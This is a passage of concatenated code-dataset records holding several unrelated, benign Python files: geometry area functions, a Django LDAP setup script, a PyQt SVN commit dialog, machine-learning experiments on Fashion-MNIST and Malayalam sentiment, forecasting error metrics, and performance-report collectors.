Métraux\"\n__copyright__ = \"Copyright 2011, Personal Library\"\n__credits__ = [\"Valentin Métraux\"]\n__license__ = \"GPL\"\n__version__ = \"12.07.2011\"\n__maintainer__ = \"Valentin Métraux\"\n__email__ = \"valentin@valentinmetraux.com\"\n__status__ = \"production\"\n\n################################################################################\n################################################################################\n#\n# FUNCTIONS\n#\n################################################################################\n################################################################################\ndef rectangle(width, height):\n \"\"\"\n rectangle(width, height) -> float number for area\n\n Return a float number for the area of the rectangle with specified width\n and height.\n\n Parameters\n ----------\n width: float or integer number\n height: float or integer number\n\n Returns\n -------\n area: float number\n\n Notes\n -----\n No particular bug known\n \n \"\"\"\n width = float(width)\n height = float(height)\n area = width*height\n return area\n\ndef square(side):\n \"\"\"\n square(side) -> float number for area\n\n Return a float number for the area of the square with specified side length\n\n Parameters\n ----------\n side: float or integer number\n\n Returns\n -------\n area: float number\n\n Notes\n -----\n No particular bug known\n \n \"\"\"\n side = float(side)\n area = side**2\n return area\n\ndef triangle(base, height):\n \"\"\"\n triangle(base, height) -> float number for area\n\n Return a float number for the area of the triangle with specified base\n and height.\n\n Parameters\n ----------\n base: float or integer number\n height: float or integer number\n\n Returns\n -------\n area: float number\n\n Notes\n -----\n No particular bug known\n \n \"\"\"\n base = float(base)\n height = float(height)\n area = 0.5*base*height\n return area\n \ndef parallelograms(base, height):\n \"\"\"\n parallelograms(base, height) -> float number for area\n\n Return a float number for the area of the parallelograms with specified base\n and height.\n\n Parameters\n ----------\n base: float or integer number\n height: float or integer number\n\n Returns\n -------\n area: float number\n\n Notes\n -----\n No particular bug known\n \n \"\"\"\n base, height = float(base), float(height)\n area = base*height\n return area\n \ndef rhomboedre(smallDiag, bigDiag):\n \"\"\"\n rhomboedre(smallDiag, bigDiag) -> float number for area\n\n Return a float number for the area of the rhomboedre with specified diagonals.\n\n Parameters\n ----------\n smallDiag: float or integer number\n bigDiag: float or integer number\n\n Returns\n -------\n area: float number\n\n Notes\n -----\n No particular bug known\n \n \"\"\"\n smallDiag, bigDiag = float(smallDiag), float(bigDiag)\n area = 0.5*bigDiag*smallDiag\n return area\n\ndef trapeze(base1, base2, height):\n \"\"\"\n trapeze(base, height) -> float number for area\n\n Return a float number for the area of the trapeze with specified bases\n and height.\n\n Parameters\n ----------\n base1: float or integer number\n base2: float or integer number\n height: float or integer number\n\n Returns\n -------\n area: float number\n\n Notes\n -----\n No particular bug known\n \n \"\"\"\n base1, base2 = float(base1), float(base2)\n height = float(height)\n area = 0.5*height*(base1+base2)\n return area\n \ndef circle(radius):\n \"\"\"\n circle(radius) -> float number for area\n\n Return a float number for the area of the circle with specified radius.\n\n Parameters\n 
----------\n radius: float or integer number\n\n Returns\n -------\n area: float number\n\n Notes\n -----\n No particular bug known\n \n \"\"\"\n radius = float(radius)\n area = pi*radius**2\n return area\n \ndef circleSector(radius, degrees):\n \"\"\"\n circleSector(radius, degrees) -> float number for area\n\n Return a float number for the area of the circle sector with specified radius\n and angle.\n\n Parameters\n ----------\n radius: float or integer number\n degrees: angle of the sector in degrees, float or integer\n\n Returns\n -------\n area: float number\n\n Notes\n -----\n No particular bug known\n \n \"\"\"\n radius, degrees = float(radius), float(degrees)\n area = (degrees/360)*(circle(radius))\n return area\n\n#EOF\n","sub_path":"hierophis/maths/geometry/area.py","file_name":"area.py","file_ext":"py","file_size_in_byte":6130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"516455164","text":"from distutils.core import setup\nimport os\n\n\ndef split_relative_path(path):\n \"\"\"\n Given a path, return the path as a string with the\n first path component removed (e.g. 'foo/bar/baz' would\n be returned as 'bar/baz').\n \"\"\"\n parts = []\n while True:\n head, tail = os.path.split(path)\n if head == path:\n if path:\n parts.append(path)\n break\n parts.append(tail)\n path = head\n parts.reverse()\n if len(parts) > 1:\n return os.path.join(*parts[1:])\n else:\n return ''\n\ndef get_readme(filename):\n \"\"\"\n Utility function to print the README file, used for the long_description\n setup argument below.\n \"\"\"\n return open(os.path.join(os.path.dirname(__file__), filename)).read()\n\npackages, package_data = [], []\nroot_dir = os.path.dirname(__file__)\nif root_dir:\n os.chdir(root_dir)\n\n# Collect the lists of packages and package files, starting\n# from the base project directory (adapted from the Django setup script)\nfor dirpath, dirnames, filenames in os.walk('ldap_sync'):\n # Collect packages\n if '__init__.py' in filenames:\n pkg_path = os.path.normpath(dirpath)\n pkg = pkg_path.replace(os.sep, '.')\n if os.altsep:\n pkg = pkg.replace(os.altsep, '.')\n packages.append(pkg)\n # Collect ancillary package files\n elif filenames:\n relative_path = split_relative_path(dirpath)\n for f in filenames:\n package_data.append(os.path.join(relative_path, f))\n\nsetup(\n name = 'django-ldap-sync',\n version = '0.1',\n description = 'A Django application for synchronizing LDAP users and groups',\n long_description = get_readme('README'),\n author = 'Jason Bittel',\n author_email = 'jason.bittel@gmail.com',\n url = 'http://github.com/jbittel/django-ldap-sync',\n download_url = 'https://github.com/jbittel/django-ldap-sync/tarball/master',\n package_dir = { 'ldap-sync': 'ldap-sync' },\n packages = packages,\n package_data = { 'ldap-sync': package_data },\n license = 'BSD',\n classifiers = [\n 'Development Status :: 2 - Pre-Alpha',\n 'Environment :: Web Environment',\n 'Programming Language :: Python',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Topic :: System :: Systems Administration :: Authentication/Directory',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n keywords = ['django', 'ldap', 'active directory', 'synchronize', 
'sync'],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"147900382","text":"# -*- coding: utf-8 -*-\n\n# Copyright (c) 2003 - 2019 Detlev Offenbach \n#\n\n\"\"\"\nModule implementing a dialog to enter the commit message.\n\"\"\"\n\n\nimport pysvn\n\nfrom PyQt5.QtCore import pyqtSignal, Qt, pyqtSlot\nfrom PyQt5.QtWidgets import QWidget, QDialogButtonBox\n\nfrom .Ui_SvnCommitDialog import Ui_SvnCommitDialog\n\nimport Preferences\n\n\nclass SvnCommitDialog(QWidget, Ui_SvnCommitDialog):\n \"\"\"\n Class implementing a dialog to enter the commit message.\n \n @signal accepted() emitted, if the dialog was accepted\n @signal rejected() emitted, if the dialog was rejected\n \"\"\"\n accepted = pyqtSignal()\n rejected = pyqtSignal()\n \n def __init__(self, changelists, parent=None):\n \"\"\"\n Constructor\n \n @param changelists list of available change lists (list of strings)\n @param parent parent widget (QWidget)\n \"\"\"\n super(SvnCommitDialog, self).__init__(\n parent, Qt.WindowFlags(Qt.Window))\n self.setupUi(self)\n \n if pysvn.svn_version < (1, 5, 0) or pysvn.version < (1, 6, 0):\n self.changeListsGroup.hide()\n else:\n self.changeLists.addItems(sorted(changelists))\n \n def showEvent(self, evt):\n \"\"\"\n Protected method called when the dialog is about to be shown.\n \n @param evt the event (QShowEvent)\n \"\"\"\n self.recentCommitMessages = Preferences.toList(\n Preferences.Prefs.settings.value('Subversion/Commits'))\n self.recentComboBox.clear()\n self.recentComboBox.addItem(\"\")\n self.recentComboBox.addItems(self.recentCommitMessages)\n \n self.logEdit.setFocus(Qt.OtherFocusReason)\n \n def logMessage(self):\n \"\"\"\n Public method to retrieve the log message.\n \n This method has the side effect of saving the 20 most recent\n commit messages for reuse.\n \n @return the log message (string)\n \"\"\"\n msg = self.logEdit.toPlainText()\n if msg:\n if msg in self.recentCommitMessages:\n self.recentCommitMessages.remove(msg)\n self.recentCommitMessages.insert(0, msg)\n no = int(Preferences.Prefs.settings.value(\n 'Subversion/CommitMessages', 20))\n del self.recentCommitMessages[no:]\n Preferences.Prefs.settings.setValue(\n 'Subversion/Commits', self.recentCommitMessages)\n return msg\n \n def hasChangelists(self):\n \"\"\"\n Public method to check, if the user entered some changelists.\n \n @return flag indicating availability of changelists (boolean)\n \"\"\"\n return len(self.changeLists.selectedItems()) > 0\n \n def changelistsData(self):\n \"\"\"\n Public method to retrieve the changelists data.\n \n @return tuple containing the changelists (list of strings) and a flag\n indicating to keep changelists (boolean)\n \"\"\"\n slists = [l.text().strip() for l in self.changeLists.selectedItems()\n if l.text().strip() != \"\"]\n \n if len(slists) == 0:\n return [], False\n \n return slists, self.keepChangeListsCheckBox.isChecked()\n \n def on_buttonBox_clicked(self, button):\n \"\"\"\n Private slot called by a button of the button box clicked.\n \n @param button button that was clicked (QAbstractButton)\n \"\"\"\n if button == self.buttonBox.button(QDialogButtonBox.Cancel):\n self.logEdit.clear()\n \n def on_buttonBox_accepted(self):\n \"\"\"\n Private slot called by the buttonBox accepted signal.\n \"\"\"\n self.close()\n self.accepted.emit()\n \n def on_buttonBox_rejected(self):\n \"\"\"\n Private slot called by the buttonBox rejected 
signal.\n \"\"\"\n self.close()\n self.rejected.emit()\n \n @pyqtSlot(str)\n def on_recentComboBox_activated(self, txt):\n \"\"\"\n Private slot to select a commit message from recent ones.\n \n @param txt selected recent commit message (string)\n \"\"\"\n if txt:\n self.logEdit.setPlainText(txt)\n","sub_path":"PYTHON/Python_GUI/eric6-19.11/eric/eric6/Plugins/VcsPlugins/vcsPySvn/SvnCommitDialog.py","file_name":"SvnCommitDialog.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"378874064","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\nimport tensorflow as tf\nfrom keras.datasets import fashion_mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras.activations import softmax\nfrom keras.optimizers import adam\nfrom keras.losses import sparse_categorical_crossentropy\n\n# from sklearn import\n\n\ndef NN_with(x_train, y_train, nouron_number_layer1, nouron_number_layer2, batch_size, epoch):\n my_model = Sequential()\n my_model.add(Dense(nouron_number_layer1, activation='relu', input_shape=(784,)))\n my_model.add(Dense(nouron_number_layer2, activation='relu'))\n my_model.add(Dropout(0.3))\n my_model.add(Dense(10, activation=softmax))\n my_model.compile(optimizer='sgd', loss=sparse_categorical_crossentropy, metrics=['accuracy'])\n trained_model = my_model.fit(x_train, y_train, batch_size=batch_size, epochs=epoch, validation_split=0.2)\n return trained_model, my_model\n\n\ndef my_nn(nouron_number_layer1, nouron_number_layer2, batch_size, epoch):\n print(\"\\n\\n\\n Network With layer1 of: \", nouron_number_layer1, \"Nourons and layer2 of: \", nouron_number_layer2, \"and Batch_size: \", batch_size, \"And Epoch: \", epoch)\n (x_train, y_train), (x_test, y_test) = fashion_mnist.load_data()\n\n x_train = x_train / 255.0\n x_test = x_test / 255.0\n\n class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat', 'Sandal', 'Shirt', 'Sneaker', 'Bag',\n 'Ankle boot']\n\n x_train = np.array(x_train).reshape(60000, 28 * 28)\n x_test = np.array(x_test).reshape(10000, 28 * 28)\n\n start_time = time.time()\n trained_model, my_model = NN_with(x_train, y_train, nouron_number_layer1, nouron_number_layer2, batch_size, epoch)\n print(\"Trained finished in: \", time.time() - start_time)\n history = trained_model.history\n test_loss, test_acc = my_model.evaluate(x_test, y_test, verbose=2)\n print('\\nTest accuracy:', test_acc)\n print('\\nTest loss:', test_loss)\n\n plt.title('NN with layer1 of: ' + str(nouron_number_layer1) + ' layer2 of: ' + str(nouron_number_layer2) + ' batch_size of: ' + str(batch_size))\n plt.xlabel('Epochs')\n plt.ylabel('Loss')\n plt.plot(history['loss'])\n plt.plot(history['val_loss'])\n plt.legend(['loss', 'val_loss'])\n\n plt.figure()\n plt.title('NN with layer1 of: ' + str(nouron_number_layer1) + ' layer2 of: ' + str(nouron_number_layer2) + ' batch_size of: ' + str(batch_size))\n plt.xlabel('Epochs')\n plt.ylabel('accuracy')\n plt.plot(history['accuracy'])\n plt.plot(history['val_accuracy'])\n plt.legend(['acc', 'val_acc'])\n\n plt.show()\n\n from sklearn.metrics import confusion_matrix\n test_prediction = my_model.predict_classes(x_test)\n matrix = confusion_matrix(y_true=y_test, y_pred=test_prediction)\n print(\"Matrix= \")\n\n print(matrix)\n\n marks = np.arange(len(class_names))\n cmap = plt.cm.Blues\n # title = 'Confusion matrix'\n plt.figure()\n plt.imshow(matrix, interpolation='nearest', cmap=cmap)\n 
plt.title('NN with layer1 of: ' + str(nouron_number_layer1) + ' layer2 of: ' + str(nouron_number_layer2) + ' batch_size of: ' + str(batch_size) + ' For Confusion matrix')\n plt.colorbar()\n plt.xticks(marks, class_names, rotation=45)\n plt.yticks(marks, class_names)\n plt.tight_layout()\n plt.show()\n\n\nmy_nn(70, 10, 32, 30)\nmy_nn(128, 30, 32, 30)\nmy_nn(784, 128, 32, 30)\n#\n#\nmy_nn(128, 50, 32, 30)\nmy_nn(128, 50, 64, 30)\nmy_nn(128, 50, 256, 30)\n","sub_path":"MLP_Madaline_DimensionalityReduction/Fashion-MNIST_Classification.py","file_name":"Fashion-MNIST_Classification.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"617156940","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 1 12:12:17 2018\n\n@author: nicholas.marini\n\"\"\"\n\nheight = int(input(\"How high do you want your pyramid? \"))\n\nblock = \"*\"\n\nwhile height >0:\n print(block*height)\n height -= 1\nelse:\n print(\"the end\")","sub_path":"Python/Week1/pyramid.py","file_name":"pyramid.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"642588162","text":"'''\nRuns for CodeMIx Sentiment Analysis task2\nauthors: Nitin Nikamanth Appiah Balaji, Bharahti B\n'''\nfrom sklearn.metrics import f1_score, accuracy_score\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import precision_score, recall_score, f1_score\nimport pandas as pd\nimport numpy as np\nfrom sentence_transformers import SentenceTransformer\nfrom tqdm import tqdm\n\n'''\nLoading data-sets\n'''\ntrain = pd.read_csv('../codemix-corpus-fire2020/malayalam_train.tsv','\\t')\ndev = pd.read_csv('../codemix-corpus-fire2020/malayalam_dev.tsv','\\t')\ntest = pd.read_csv('../Dravidian-CodeMix/malayalam_test.csv')\n\nX_train_ori, y_train = train['text'], train['category']\nX_dev_ori, y_dev = dev['text'], dev['category']\nX_test_ori, y_test = test['text'], dev['category']\n\n'''\nGenerating char count vectorization and converting sentences to vectors\nchar count ngram range=1-5\n'''\nvectorizer = CountVectorizer(analyzer='char', ngram_range=(1,5), max_features=50000)\nX_train = vectorizer.fit_transform(X_train_ori)\nX_dev = vectorizer.transform(X_dev_ori)\nX_test = vectorizer.transform(X_test_ori)\n\nclf = BernoulliNB()\nclf.fit(X_train, y_train)\npred = clf.predict(X_dev)\nprint(\"Count vec + NB:\")\n# print(\"f1 score:\",f1_score(y_dev, pred, average='weighted'))\n# print(\"acc:\",accuracy_score(y_dev, pred))\nprint(classification_report(y_dev, pred))\n\nclf = MLPClassifier(hidden_layer_sizes=(512),max_iter=300)\nclf.fit(X_train, y_train)\npred = clf.predict(X_dev)\nprint(\"Count vec + LR\")\n# print(\"f1 score:\",f1_score(y_dev, pred, average='weighted'))\n# print(\"acc:\",accuracy_score(y_dev, pred))\nprint(classification_report(y_dev, pred))\n\n'''\nGenerating char TFIDF vectorization and converting sentences to vectors\nchar TFIDF ngram range=1-5\n'''\nvectorizer = TfidfVectorizer(analyzer='char', ngram_range=(1,5), max_features=50000)\nX_train = vectorizer.fit_transform(X_train_ori)\nX_dev = vectorizer.transform(X_dev_ori)\nX_test = 
vectorizer.transform(X_test_ori)\n\nclf = BernoulliNB()\nclf.fit(X_train, y_train)\npred = clf.predict(X_dev)\nprint(\"TFIDF + NB:\")\n# print(\"f1 score:\",f1_score(y_dev, pred, average='weighted'))\n# print(\"acc:\",accuracy_score(y_dev, pred))\nprint(classification_report(y_dev, pred))\n\nclf = MLPClassifier(hidden_layer_sizes=(512), max_iter=300)\nclf.fit(X_train, y_train)\npred = clf.predict(X_dev)\nprint(\"TFIDF + LR:\")\n# print(\"f1 score:\",f1_score(y_dev, pred, average='weighted'))\n# print(\"acc:\",accuracy_score(y_dev, pred))\nprint(classification_report(y_dev, pred))\n\n'''\nmultilingual BERT model loading and embedding generation\n'''\ntest = pd.read_csv('../Dravidian-CodeMix/malayalam_test.csv')\nmodel = SentenceTransformer('distiluse-base-multilingual-cased',device='cuda:1')\nX_train = model.encode(X_train_ori, batch_size=20,show_progress_bar=True)\nX_dev = model.encode(X_dev_ori, batch_size=20, show_progress_bar=True)\nX_test = model.encode(X_test_ori, batch_size=20, show_progress_bar=True)\n\nclf = MLPClassifier(hidden_layer_sizes=(512,),max_iter=25)\nclf.fit(X_train, y_train)\npred = clf.predict(X_dev)\nprint(\"BERT + MLP:\")\n# print(\"f1 score:\",f1_score(y_dev, pred, average='weighted'))\n# print(\"acc:\",accuracy_score(y_dev, pred))\nprint(classification_report(y_dev, pred))\n\n'''\nLoading Malayalam specific pretrained fastText model\n'''\nfrom pymagnitude import *\nfrom nltk import word_tokenize\nfast = Magnitude(\"../downloads/malayalam.magnitude\")\ndef fasttext(x):\n vectors = []\n for title in tqdm(x):\n vectors.append(np.average(fast.query(word_tokenize(title)), axis = 0))\n return np.array(vectors)\nX_train = fasttext(train['text'])\nX_dev = fasttext(dev['text'])\n\nclf = MLPClassifier(hidden_layer_sizes=(1024,),max_iter=25)\nclf.fit(X_train, y_train)\npred = clf.predict(X_dev)\nprint(\"FASTTEXT + MLP:\")\n# print(\"f1 score:\",f1_score(y_dev, pred,average='weighted'))\n# print(\"acc:\",accuracy_score(y_dev, pred))\nprint(classification_report(y_dev, pred))\n","sub_path":"CodeMix-Sentiment_Analysis/Task2-vectorization.py","file_name":"Task2-vectorization.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"561221679","text":"# -*- coding: utf-8 -*-\n\"\"\"Metrics module for error functions.\"\"\"\n\nfrom functools import wraps\n\nimport numpy as np\n\n\ndef mae(data, data_truth):\n \"\"\"Computes mean absolute error (MAE)\n\n :param data: Predicted time series values (n_timesteps, n_timeseries)\n :type data: numpy array\n :param data_truth: Ground truth time series values\n :type data_truth: numpy array\n\n \"\"\"\n\n return np.mean(np.abs(data - data_truth))\n\n\ndef mape(data, data_truth):\n \"\"\"Computes mean absolute percentage error (MAPE)\n\n :param data: Predicted time series values (n_timesteps, n_timeseries)\n :type data: numpy array\n :param data_truth: Ground truth time series values\n :type data_truth: numpy array\n\n \"\"\"\n\n eps = 1e-16 # Need to make sure that denominator is not zero\n normalization = np.abs(data_truth) + eps\n\n return np.mean(np.abs(data - data_truth) / normalization) * 100.0\n\n\ndef mse(data, data_truth):\n \"\"\"Computes mean squared error (MSE)\n\n :param data: Predicted time series values (n_timesteps, n_timeseries)\n :type data: numpy array\n :param data_truth: Ground truth time series values\n :type data_truth: numpy array\n\n \"\"\"\n\n return np.mean(np.square((data - data_truth)))\n\n\ndef rmse(data, data_truth):\n 
\"\"\"Computes root-mean squared error (RMSE)\n\n :param data: Predicted time series values (n_timesteps, n_timeseries)\n :type data: numpy array\n :param data_truth: Ground truth time series values\n :type data_truth: numpy array\n\n \"\"\"\n\n return np.sqrt(mse(data, data_truth))\n\n\ndef smape(data, data_truth):\n \"\"\"Computes symmetric mean absolute percentage error (SMAPE)\n\n :param data: Predicted time series values (n_timesteps, n_timeseries)\n :type data: numpy array\n :param data_truth: Ground truth time series values\n :type data_truth: numpy array\n\n \"\"\"\n\n eps = 1e-16 # Need to make sure that denominator is not zero\n normalization = 0.5 * (np.abs(data) + np.abs(data_truth)) + eps\n\n return np.mean(np.abs(data - data_truth) / normalization) * 100.0\n\n\ndef mase(data, data_truth, insample, freq):\n \"\"\"Calculates Mean Absolute Scaled Error (MASE)\n\n :param data: Predicted time series values (n_timesteps, n_timeseries)\n :type data: numpy array\n :param data_truth: Ground truth time series values\n :type data_truth: numpy array\n :param insample: time series in training set (n_timesteps, n_timeseries)\n :type insample: numpy array\n :param freq: frequency or seasonality in the data (i.e. 12 for monthly series)\n :type freq: integer\n\n \"\"\"\n\n eps = 1e-16 # Need to make sure that denominator is not zero\n normalization = np.mean(np.abs(insample[freq:] - insample[:-freq])) + eps\n\n return np.mean(np.abs(data - data_truth)) / normalization * 100.0\n\n\ndef msis(data_upper, data_lower, data_truth, insample, freq, alpha=0.05):\n \"\"\"Computes Mean Scaled Interval Score (MSIS)\n\n :param data_upper: Predicted upper bound of time series values \n :type data_upper: numpy array\n :param data_lower: Predicted lower bound of time series values\n :type data_lower: numpy array\n :param data_truth: Ground truth time series values\n :type data_truth: numpy array\n :param insample: time series in training set (n_timesteps, n_timeseries)\n :type insample: numpy array\n :param freq: frequency or seasonality in the data (i.e. 12 for monthly series)\n :type freq: integer\n :param alpha: significance level (i.e. 
95% confidence interval means alpha = 0.05) \n :type alpha: float\n\n \"\"\"\n\n eps = 1e-16 # Need to make sure that denominator is not zero\n normalization = np.mean(np.abs(insample[freq:] - insample[:-freq])) + eps\n mean_interval_score = np.mean((data_upper - data_lower)\n + 2.0 / alpha *\n (data_lower - data_truth) *\n (data_truth < data_lower)\n + 2.0 / alpha *\n (data_truth - data_upper) *\n (data_truth > data_upper)\n )\n\n return mean_interval_score / normalization * 100.0\n\n\ndef coverage(data_upper, data_lower, data_truth):\n \"\"\"Computes coverage rate of the prediction interval.\n\n :param data_upper: Predicted upper bound of time series values \n :type data_upper: numpy array\n :param data_lower: Predicted lower bound of time series values\n :type data_lower: numpy array\n :param data_truth: Ground truth time series values\n :type data_truth: numpy array\n\n \"\"\"\n\n coverage_percentage = np.mean(\n 1.0 * (data_truth > data_lower) * (data_truth < data_upper))\n\n return coverage_percentage * 100.0\n\n\ndef print_model_performance_mean_accuracy(data, data_truth,\n metric_list=['mape', 'smape'],\n freq=12, ts_train=None):\n \"\"\"Print out model performance on prediction accuracy\n\n :param data: Predicted time series values (n_timesteps, n_timeseries)\n :type data: numpy array\n :param data_truth: Ground truth time series values\n :type data_truth: numpy array\n :param metric_list: names of metrics to measure accuracy, e.g. mape, smape, mase\n :type metric_list: string or list, e.g. 'mape' or ['mape','smape','mase']\n :param freq: frequency or seasonality in the data (i.e. 12 for monthly series)\n :type freq: integer\n :param ts_train: time series in training set (n_timesteps, n_timeseries)\n :type ts_train: numpy array\n\n \"\"\"\n\n # check if metric_list is a list; if not, convert to a list.\n if (not isinstance(metric_list, list)):\n metric_list = [metric_list]\n\n metric_value = []\n for i in metric_list:\n if (i == 'mape'):\n name = 'Mean Absolute Percentage Error'\n val = mape(data, data_truth)\n print('\\t {0}: {1:.1f}%'.format(name, val))\n metric_value.append(val)\n elif(i == 'smape'):\n name = 'Symmetric Mean Absolute Percentage Error'\n val = smape(data, data_truth)\n print('\\t {0}: {1:.1f}%'.format(name, val))\n metric_value.append(val)\n elif (i == 'mase'):\n name = 'Mean Absolute Scaled Error'\n val = mase(data, data_truth, ts_train, freq)\n print('\\t {0}: {1:.1f}%'.format(name, val))\n metric_value.append(val)\n\n return metric_value\n\n\ndef print_model_performance_uncertainty(pred_samples, data_truth,\n metric_list='coverage', freq=12,\n confidence_level=0.95,\n ts_train=None, verbose=True):\n \"\"\"Print out model performance on uncertainty\n\n :param pred_samples: Prediction samples of time series (n_timesteps, n_timeseries)\n :type pred_samples: numpy array\n :param data_truth: Ground truth time series values (n_timesteps, n_timeseries)\n :type data_truth: numpy array\n :param metric_list: names of metrics to measure uncertainty, e.g. 'msis', 'coverage'\n :type metric_list: string or list, e.g. 'coverage' or ['msis','coverage']\n :param freq: frequency or seasonality in the data (i.e. 12 for monthly series)\n :type freq: integer\n :param confidence_level: specified confidence level for the predictive interval, e.g. 0.95\n :type confidence_level: float or list, values between 0 and 1, e.g. 
[0.9, 0.95]\n :param ts_train: time series in training set (n_timesteps, n_timeseries)\n :type ts_train: numpy array\n :param verbose: print out the metric values\n :type verbose: boolean\n\n \"\"\"\n\n if (not isinstance(metric_list, list)):\n metric_list = [metric_list]\n\n if (not isinstance(confidence_level, list)):\n confidence_level = [confidence_level]\n\n metric_value_all_confidence_level = []\n\n for p in confidence_level:\n alpha = 1.0 - p\n quantiles = [alpha / 2 * 100, (1 - alpha / 2) * 100]\n\n pred_upper = np.nanpercentile(pred_samples, quantiles[1], axis=0)\n pred_lower = np.nanpercentile(pred_samples, quantiles[0], axis=0)\n\n metric_value = []\n for i in metric_list:\n if (i == 'msis'):\n name = 'Mean Scaled Interval Score'\n val = msis(pred_upper, pred_lower,\n data_truth, ts_train, freq, alpha)\n metric_value.append(val)\n if verbose:\n print('\\t {0} at {1}% confidence level: {2:.1f}%'.format(\n name, int(p*100), val))\n elif (i == 'coverage'):\n name = 'Coverage Percentage'\n val = coverage(pred_upper, pred_lower, data_truth)\n metric_value.append(val)\n if verbose:\n print('\\t {0} at {1}% confidence level: {2:.1f}%'.format(\n name, int(p*100), val))\n\n metric_value_all_confidence_level.append(metric_value)\n\n return metric_value_all_confidence_level\n","sub_path":"deep4cast/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":9054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"282295022","text":"N = int(input())\nA = []\nmemo = []\ncandidate = {}\n\ndef set_A():\n global A\n \n import sys\n A.append(-1)\n A += list(map(int, sys.stdin.readline().split()))\n\ndef set_memo():\n memo.append(-1)\n memo.append(1)\n\ndef set_candidate():\n candidate[-1] = 0\n candidate[A[1]] = 1\n\ndef update_memo_candidate(ind, target):\n memo.append(target)\n candidate[A[ind]] = target\n\ndef get_cand(num):\n keys = candidate.keys()\n keys = sorted(keys, reverse=True)\n \n result = 0\n for i in keys:\n if(num > i):\n result = max(candidate[i], result)\n\n return result\n\ndef record():\n for ind in range(2, N+1):\n target = get_cand(A[ind])\n\n if(A[ind - 1] < A[ind]):\n target = max(memo[ind - 1], target)\n\n target += 1\n\n update_memo_candidate(ind, target)\n\ndef is_extra():\n if(N == 1):\n print(memo[1])\n return True\n return False\n\ndef print_result():\n # print(candidate)\n print(max(memo))\n\ndef main():\n if(not is_extra()):\n record()\n print_result()\n\nif(__name__ == \"__main__\"):\n set_A()\n set_memo()\n set_candidate()\n main()","sub_path":"by date/2021.01.29/11053.py","file_name":"11053.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"646783083","text":"\"\"\"Performancetest-runner collector.\"\"\"\n\nfrom abc import ABC\nfrom datetime import datetime\nfrom typing import List\n\nfrom bs4 import BeautifulSoup, Tag\n\nfrom collector_utilities.type import Entities, Entity, Response, Responses, Value\nfrom .source_collector import FileSourceCollector, SourceUpToDatenessCollector\n\n\nclass PerformanceTestRunnerBaseClass(FileSourceCollector, ABC): # pylint: disable=abstract-method\n \"\"\"Base class for performancetest runner collectors.\"\"\"\n\n file_extensions = [\"html\"]\n\n @staticmethod\n def _soup(response: Response):\n \"\"\"Return the HTML soup.\"\"\"\n return BeautifulSoup(response.text, \"html.parser\")\n\n\nclass PerformanceTestRunnerSlowTransactions(PerformanceTestRunnerBaseClass):\n 
\"\"\"Collector for the number of slow transactions in a Performancetest-runner performancetest report.\"\"\"\n\n def _parse_source_responses_value(self, responses: Responses) -> Value:\n return str(len(self.__slow_transactions(responses)))\n\n def _parse_source_responses_entities(self, responses: Responses) -> Entities:\n\n def entity(transaction) -> Entity:\n \"\"\"Transform a transaction into a transaction entity.\"\"\"\n name = transaction.find(\"td\", class_=\"name\").string\n threshold = \"high\" if transaction.select(\"td.red.evaluated\") else \"warning\"\n return dict(key=name, name=name, threshold=threshold)\n\n return [entity(transaction) for transaction in self.__slow_transactions(responses)]\n\n def __slow_transactions(self, responses: Responses) -> List[Tag]:\n \"\"\"Return the slow transactions in the performancetest report.\"\"\"\n thresholds = self._parameter(\"thresholds\")\n slow_transactions: List[Tag] = []\n for response in responses:\n soup = self._soup(response)\n for color in thresholds:\n slow_transactions.extend(soup.select(f\"tr.transaction:has(> td.{color}.evaluated)\"))\n return slow_transactions\n\n\nclass PerformanceTestRunnerSourceUpToDateness(PerformanceTestRunnerBaseClass, SourceUpToDatenessCollector):\n \"\"\"Collector for the performancetest report age.\"\"\"\n\n def _parse_source_response_date_time(self, response: Response) -> datetime:\n datetime_parts = [int(part) for part in self._soup(response).find(id=\"start_of_the_test\").string.split(\".\")]\n return datetime(*datetime_parts) # type: ignore\n\n\nclass PerformanceTestRunnerPerformanceTestDuration(PerformanceTestRunnerBaseClass):\n \"\"\"Collector for the performancetest duration.\"\"\"\n\n def _parse_source_responses_value(self, responses: Responses) -> Value:\n durations = []\n for response in responses:\n hours, minutes, seconds = [\n int(part) for part in self._soup(response).find(id=\"duration\").string.split(\":\", 2)]\n durations.append(60 * hours + minutes + round(seconds / 60.))\n return str(sum(durations))\n\n\nclass PerformanceTestRunnerPerformanceTestStability(PerformanceTestRunnerBaseClass):\n \"\"\"Collector for the performancetest stability.\"\"\"\n\n def _parse_source_responses_value(self, responses: Responses) -> Value:\n trend_breaks = []\n for response in responses:\n trend_breaks.append(int(self._soup(response).find(id=\"trendbreak_stability\").string))\n return str(min(trend_breaks))\n\n\nclass 